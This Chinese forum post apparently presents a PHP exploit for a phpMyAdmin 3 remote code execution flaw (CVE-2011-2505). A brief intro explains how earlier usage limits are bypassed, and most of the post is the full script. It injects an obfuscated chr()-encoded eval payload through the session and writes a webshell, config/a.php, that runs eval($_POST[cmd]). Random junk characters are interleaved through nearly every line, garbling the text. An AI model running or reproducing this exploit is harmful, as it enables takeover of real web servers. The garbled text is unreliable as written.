最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
: R- u( Z2 l: R/ N- F7 q; Y3 q, s. V% t8 i v1 L
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
/ X' j2 N; p0 h* g
$ a7 C) F. V8 o' i I首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
, T x5 C- V) g. {/ b: t& @一是session.auto_start = 1;* W0 n/ d4 Q6 ~9 U8 M
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。5 C5 O3 U, P2 s; P$ \( t
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。" E) m/ D2 f4 ] K" N
* J9 w+ X, @. L! x9 U4 O7 Z在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
/ z' I- n$ r) K' R/ J! a' ~
: j4 ^. q- p. \# S/ u6 _" [于是写了这个php版本的exp,代码如下:
' E ], a$ U6 d( p, J( [) x1 x3 N! M4 Z2 q D- @
#!/usr/bin/php/ _/ _+ d% ?5 _1 i" r
<?php
# x/ e* m7 B5 n+ d. q8 _print_r('
9 B; S7 q/ h, k3 R9 |) ^2 b+---------------------------------------------------------------------------+1 X* n ^* V2 U; e
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
$ J6 M) |8 B5 f) e' lby oldjun(www.oldjun.com)
1 R7 s- B1 J: Uwelcome to www.t00ls.net1 @; T5 z6 X+ Z& K: M
mail: oldjun@gmail.com( E5 \1 g, x- Y" n; c! G' o# g9 y
Assigned CVE id: CVE-2011-2505* a/ p% d/ ^8 q: X; ~( Y2 L( k/ I( D
+---------------------------------------------------------------------------+! U. A2 w! F" {/ { M: [
');. ^1 Y4 N7 u; ^4 g8 |7 X
4 E+ J6 d d) t0 T9 q5 S/**
. q+ S6 m. y6 u' \, K- V4 T$ P5 ] * working when the directory:"config" exists and is writeable.
$ O9 W, t( {4 B**/6 Z4 [+ u! a( I/ K/ o5 z2 k
2 T2 J; R6 R3 z# |if ($argc < 3) {
) m* F# t8 U* S+ y print_r('* k! O" S J0 d' ]
+---------------------------------------------------------------------------+. s9 l5 B& I% s' D" R8 @6 K* X8 w
Usage: php '.$argv[0].' host path
# U" V- |) [" B3 j( I0 D2 @host: target server (ip/hostname)
/ o. V: v; |, H8 n+ m7 t8 K$ [: bpath: path to pma3
# x% d. k8 L, R$ ~8 IExample:
+ t0 ~" d% b4 x" wphp '.$argv[0].' localhost /pma/& A' x R" c; Z9 m$ X
+---------------------------------------------------------------------------+8 }/ n7 M- _& ]3 w8 ]) `
');
& r. a1 ^8 K, Y/ u- S! s) ? exit;
6 k& I3 k8 c( i ?0 X% k2 G1 p) w6 m}! t# `! E- Y7 _+ L8 A& {
* }& ?( z: G% Y- p. S j
$host = $argv[1];
, P" R/ l6 Y. x% a- p/ S+ C6 t$path = $argv[2];
0 d z/ Q* X9 J1 w7 ]7 {
( c; s6 T; @' v/ p2 D/**
9 Y2 T/ W; s% o, A Y a) J9 Y) E6 ? * Try to determine if the directory:"config" exists
7 C, {7 K# E9 F( ]8 C**/2 T: G% F. y+ x. P7 H& F! ^
echo "[+] Try to determine if the directory:config exists....\n";9 m8 u: c1 A) l; n. R0 Z
$returnstr=php_request('config/');4 n& h0 U6 d! u4 z; X
if(strpos($returnstr,'404')){, [: t) P" W0 g% a1 _4 P; i
exit("[-] Exploit Failed! The directory:config do not exists!\n");! H ?6 I6 U* u+ I/ O- S7 T D
}0 u$ v/ I" ]8 i' n% m h( j$ U
8 `) U4 N W. ^2 p6 Y3 x1 l
/**2 H2 B i7 Y' j
* Try to get token and sessionid+ e' N" ]: j: i3 ^+ Q
**/
7 x0 p2 G, i- B% Z% N: Gecho "[+] Try to get token and sessionid....\n";
3 }" C6 d& i/ Y* G& y4 C6 O) R$result=php_request('index.php');) u8 S" b6 ?' d. l) K4 e+ d) {
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);$ B: R& Z h" n" [
$token=$resp[3];
0 g1 X, n; e) R! o$ Q( ?$sessionid=$resp[1];# z+ v8 J: {- S" a* s! O) t
if($token && $sessionid){
6 u2 v3 f4 S* |" c J Y. t echo "[+] token token\n";1 @' D7 w M1 M R0 U% A
echo "[+] Session IDsessionid\n";
( F* E6 @: c. k. X; T6 O, l; [}else{
`" v9 H. g* Y/ s exit("[-] Can't get token and Session ID,Exploit Failed!\n"); K+ q( F! r0 {: } c6 u" P/ K
}
; q, U+ _1 Z7 g3 S! e9 k3 O1 U. q7 k2 i$ y# Q+ H; \: U
/**
+ ]) X3 ?) I* A1 a/ \ i3 `9 w1 C7 r6 M$ p * Try to insert shell into session7 R% L. B! R/ ]- T
**/
6 _" n% ^/ @* |" m# Zecho "[+] Try to insert shell into session....\n";
- V4 i+ N1 \4 U' D0 o% h7 mphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here." }# n: D" t. @/ Z+ b( `- ]
% a2 @0 q2 I( {
/**
6 V. ?6 T: T3 K" [& W$ b" j2 u2 g * Try to create webshell
2 L* g7 P2 E* {, @/ y**/
1 Z7 a- I( |% H' R/ j& r V5 Vecho "[+] Try to create webshell....\n";
8 h8 \6 G- _ z$ F7 ]) e* @# Lphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
' I* @6 J! g: |4 E0 a/**
0 e, R' U/ G9 e; t# {8 r" u * Try to check if the webshell was created successfully( [4 ]8 F; i+ ?
**/
A5 s1 T. Q; r3 q2 P* Decho "[+] Try to check if the webshell was created successfully....\n";2 o$ w& R$ H9 `% [! p0 e
$content=php_request('config/config.inc.php');. z% U3 s! n0 V" [9 d
if(strpos($content,'t00ls')){
4 s* h- q W: F8 z; F7 m6 z2 c" M echo "[+] Congratulations! Expoilt successfully....\n";
' H! |* E. A: F: o; F$ \6 } echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! s3 s; q) \% M& E9 j: Q* f6 B}else{
4 X) e7 k- }8 |- W2 R; ~ exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");+ e# X- P' P* _+ }+ Y
}
4 U! H- q7 r x/ [1 N0 N b9 p) m. D! T7 [
function php_request($url,$data='',$cookie=''){
) b! O1 T% o. M global $host, $path;" L/ q5 i$ k) J% Y: e6 W8 ^
4 T0 H, W1 y7 D4 v! P6 @ $method=$data?'POST':'GET';
1 ?/ W U+ T& W; C- Y, v& C
2 X# Y2 l6 {9 x+ z $packet = $method." ".$path.$url." HTTP/1.1\r\n";5 L5 c8 V6 ?- g$ p
$packet .= "Accept: */*\r\n";
5 p1 ~3 a* h6 F# R: x$ f $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";! }/ M8 S$ ^% N& A; l9 F
$packet .= "Host: $host\r\n";. c- s4 U9 }8 u/ G, r: l3 b
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";. {% T) C4 D- o1 ?* x5 l4 Y; h P+ U
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";. @' k) u; B, I' s; D
$packet .= $cookie?"Cookie: $cookie\r\n":"";
% ` U) l6 u/ d& Z $packet .= "Connection: Close\r\n\r\n";* b: r7 H* g V" e) h
$packet .= $data?$data:"";0 Y& c( |, X7 r7 b0 p
" O! d5 E* C# ?8 X0 u$ ^
$fp = fsockopen(gethostbyname($host), 80);. I$ q. B: ~( c( B3 E/ B
if (!$fp) {
. ]* K2 u" l$ u+ l, e% L' l$ Y# I8 c echo 'No response from '.$host; die;
% h7 A- a# {! f }) D; J$ R" Z: c$ C1 }" S6 X! V( i
fputs($fp, $packet);/ ? R" c3 U# v
0 t8 g8 b( U/ ]5 M+ e. A
$resp = '';# R; y% u+ `4 U2 e) x% R
7 [& K/ U) F# |4 } while ($fp && !feof($fp))
/ l( W0 D) [/ c# z7 q $resp .= fread($fp, 1024);
4 k7 h: }) X" |" T+ E/ `% O! c4 H/ o! z: r$ \3 C
return $resp;
1 L# ~3 C! j& O& `}
* _- f2 U! A. z0 n( s" n 2 [: r: o0 T4 f( A# s' e7 l
?> 4 }: X# r) H. F- i9 f
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对